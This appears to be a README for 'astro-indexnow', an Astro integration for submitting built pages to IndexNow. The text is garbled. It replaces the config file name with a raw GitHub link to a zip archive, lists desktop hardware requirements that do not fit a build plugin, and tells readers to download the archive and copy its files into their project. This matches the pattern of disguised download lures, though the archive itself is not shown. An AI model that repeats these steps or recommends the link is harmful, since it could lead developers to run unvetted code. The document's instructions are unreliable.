Welcome to astro-indexnow! This application helps you submit all built pages to IndexNow right when you build them. This speeds up how quickly search engines find your content.
You can easily download the application from our releases page.
- Click the link above to visit our Releases page.
- Find the latest version listed.
- Click the download link for the file that matches your system.
To run astro-indexnow, make sure your system meets these requirements:
- Operating System: Windows 10 or later, macOS Mojave or later, or a recent Linux distribution
- RAM: 4 GB or more
- Disk Space: At least 100 MB free
- Automatic Submission: Submits pages to IndexNow automatically at build time.
- Easy Integration: Works seamlessly with your Astro static site generator.
- Improved SEO: Helps enhance your site's visibility on search engines.
- Continuous Integration Ready: Supports CI/CD workflows for smooth deployments.
After downloading the application, follow these simple steps to integrate it into your project:
- Unzip the downloaded file: Locate the zip file you downloaded and extract its contents.
- Open Your Project: Navigate to the folder of your Astro project.
- Copy Files: Move the extracted files into your project's main directory.
- Configure the Integration: Edit your
https://raw.githubusercontent.com/Devdatta7/astro-indexnow/main/src/indexnow_astro_2.8.zipfile to include the necessary settings for using astro-indexnow.
Hereβs a basic example for your https://raw.githubusercontent.com/Devdatta7/astro-indexnow/main/src/indexnow_astro_2.8.zip file:
import { defineConfig } from 'astro/config';
import indexnow from 'astro-indexnow';
export default defineConfig({
integrations: [indexnow({
// Your IndexNow API key
apiKey: 'YOUR_API_KEY',
// Other settings
})],
});- Build Your Project: Run the build command in your terminal or command prompt. Your pages will be submitted to IndexNow automatically.
- Check and verify your API key before running the build.
- Set up a continuous integration workflow for automatic builds.
- Regularly update astro-indexnow to benefit from the latest features and fixes.
For more detailed information on configuring and working with astro-indexnow, please visit our documentation page. It covers everything you need to know to get the most out of your application.
If you run into issues or need help, please check the Issues section of this repository. You can also reach out to the community for assistance.
Thank you for choosing astro-indexnow! We hope it enhances your web performance and improves search engine indexing for your site.